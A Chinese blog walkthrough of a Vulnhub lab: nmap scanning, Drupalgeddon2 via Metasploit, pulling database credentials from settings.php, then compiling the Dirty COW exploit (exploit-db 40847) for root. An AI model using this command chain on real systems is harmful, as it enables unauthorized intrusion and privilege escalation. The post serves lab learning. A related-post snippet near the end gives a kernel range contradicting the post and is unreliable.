DirtyCow脏牛漏洞复现(CVE-2016-5195)

已于 2022-11-16 21:18:50 修改
阅读量2.7k 收藏 9
点赞数 2
分类专栏: 从入门到入狱 文章标签: linux 网络 安全
于 2022-11-16 21:09:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/127893167
版权

DirtyCow脏牛漏洞复现

本文以vulnhub靶场中的lampiao为例复现脏牛提权漏洞

扫描c段

nmap -sS -Pn 192.168.1.0/24

找到疑似ip

在这里插入图片描述

对该ip端口进行扫描,多扫出个1898端口

nmap -A -sV -p- 192.168.1.13

在这里插入图片描述

访问80端口,没有有用的信息

在这里插入图片描述

1898也是个apche的http服务器,直接访问,是Drupal建站的

在这里插入图片描述

msf或搜索引擎查找漏洞

在这里插入图片描述

使用这个模块

use exploit/unix/webapp/drupal_drupalgeddon2

options查看需要配置的参数有两个

set rhost 192.168.1.13
set rport 1898

直接run,拿到meterpreter

在这里插入图片描述

上传linux漏洞检测脚本

https://github.com/mzet-/linux-exploit-suggester

upload /root/Attack/linux/linux-exploit-suggester.sh /tmp/666.sh

在这里插入图片描述

运行脚本

cd /tmp
chmod +x 666.sh
./666.sh

扫到一大堆洞,但主要就想复现下脏牛dirtycow,其他部分都是常规的信息收集渗透。

脏牛漏洞影响的范围从内核2.6.22开始2007年,一直到2016年10月进行Linux内核维护的Greg Kroah-Hartman宣布针对Linux 4.8、4.7和4.4LTS内核系列的维护更新(更新后为Linux kernel 4.8.3、4.7.9和4.4.26 LTS),修复了该漏洞

脏牛漏洞是 Linux 内核经典漏洞,内核内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。

在这里插入图片描述

可以用exp也可以用msf

https://github.com/firefart/dirtycow/blob/master/dirty.c

先要ssh登录才能打

ls /home

找到用户
在这里插入图片描述

cat /var/www/html/sites/default/settings.php

找到了mysql的密码
在这里插入图片描述

用这两个成功登录

ssh tiago@192.168.1.13

在这里插入图片描述

找脚本

searchsploit dirty

在这里插入图片描述

定位脚本的具体位置

locate linux/local/40847.cpp

在这里插入图片描述

通过msf上传到靶机

upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

在这里插入图片描述

编译脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o 40847 gcc生成的目标文件,名字为40847

得到root的密码
在这里插入图片描述

ssh登录root
在这里插入图片描述

拿到flag
在这里插入图片描述

tpaer
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux脏牛提权漏洞复现CVE-2016-5195
小千安全
05-06 646
脏牛漏洞是一个严重的漏洞,可以允许攻击者获得管理员权限。为了保护系统的安全,请及时更新内核并采取其他安全措施。
Linux脏牛提权漏洞 CVE-2016-5195 Vulnhub靶场
weixin_62591194的博客
07-08 555
漏洞复现Linux脏牛提权(CVE-2016-5195 vulnhub)
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
DirtyCow提权漏洞复现CVE-2016-5195复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统
2024年运维最全Linux脏牛漏洞提权复现_脏牛文件编译命令
最新发布
05-01 174
【代码】2024年运维最全Linux脏牛漏洞提权复现_脏牛文件编译命令。
漏洞复现- - -CVE-2016-5195 Dirty Cow脏牛提权漏洞
weixin_67503304的博客
11-02 4599
本文主要讲解了脏牛漏洞的提全过程及其修复建议。
CVE-2016-5195 复现记录
CoLin的pwn小屋
03-03 1081
Dirty COW——CVE-2016-5195 复现与分析
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
DirtyCow-EXP:编译好的脏牛漏洞CVE-2016-5195)EXP
05-16
脏牛漏洞(Dirty Cow)是Linux操作系统中的一个严重安全漏洞,其正式编号为CVE-2016-5195。这个漏洞源于Linux内核中的一个竞态条件错误,允许本地权限提升,即普通用户可以获取到root权限。脏牛漏洞的名字来源于...
脏牛漏洞CVE-2016-5195复现过程(详细完整版)
qq_40898302的博客
01-19 1412
KaLi 攻击机Linux靶机 靶场实验目的:掌握漏洞利用的方法掌握脏牛漏洞的原理提高对内核安全性的认识。
漏洞复现CVE-2016-5195 DirtyCow 脏牛提权
做自己喜欢的事,并将其发挥到极致!
03-10 7762
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
脏牛(Dirty Cow)快速指南
weixin_34061555的博客
11-09 2594
什么是DirtyCow 脏牛(Dirty Cow)是Linux内核的一个提权漏洞,攻击者可以利用这个漏洞获取root权限。之所以叫Dirty Cow,因为这个漏洞利用了Linux的copy-on-write机制。脏牛CVE编号是CVE-2016-5195。 怎么判断我的系统是不是受影响 脏牛的影响范围很大,几乎涵盖了主流的Linux发行版。要判断系统是...
Linux提权—脏牛漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 1562
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
脏牛内核漏洞提权(CVE-2016-5195)
不曾扬帆,何以至远方
07-05 2982
脏牛漏洞CVE-2016-5195
Kali Vulnhub-lampiao脏牛提权(dirtyCow漏洞复现
牛奶栗的小博客
09-27 4280
​vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
CVE复现NO.00001】“脏牛漏洞CVE-2016-5195复现及简要分析
arttnba3的博客
04-16 3893
CVE复现NO.00001】CVE-2016-5195复现及简要分析[github blog addr](https://arttnba3.cn/2021/04/08/NOTE-0X04-CVE-2016-5195/)0x00.一切开始之前一、写时复制机制(Copy-on-Write)basic COWmmap 与 COW二、缺页异常(page fault)分类①软性缺页异常(soft page fault)②硬性缺页异常(hard page fault)③无效缺页异常(invalid page faul
脏牛提权(靶机复现
tubug的博客
03-26 2193
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛CVE编号是CVE-2016-5195漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
Linux提权一脏牛漏洞(CVE-2016-5195)复现
07-28
你好!对于Linux提权的脏牛漏洞CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统造成损坏。 以下是复现脏牛漏洞的一般步骤: 1. 确认你的系统受到脏牛漏洞的影响。你可以使用以下命令检查: ```shell $ uname -r ``` 如果输出的内核版本在`3.0`到`4.7`之间(不包括两端),那么你的系统可能受到影响。 2. 下载并编译脏牛漏洞的测试程序,可以使用以下命令: ```shell $ git clone https://github.com/dirtycow/dirtycow.github.io $ cd dirtycow.github.io $ make ``` 3. 运行测试程序进行提权。请注意,这可能会对系统造成损坏,所以请谨慎操作。 ```shell $ ./test_dirtycow your_file_name ``` `your_file_name`是你想要修改的目标文件的路径。这个测试程序会尝试修改目标文件的权限,以实现提权效果。 4. 检查提权是否成功。你可以尝试运行一个需要超级用户权限的命令来验证。 ```shell $ sudo whoami ``` 如果输出结果为"root",那么你已经成功提权了。 请记住,在测试和复现漏洞时,务必遵守法律和道德准则。此外,确保你在合法的环境下进行测试,并获得了合适的授权。 希望这些步骤能帮助到你!如果你有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值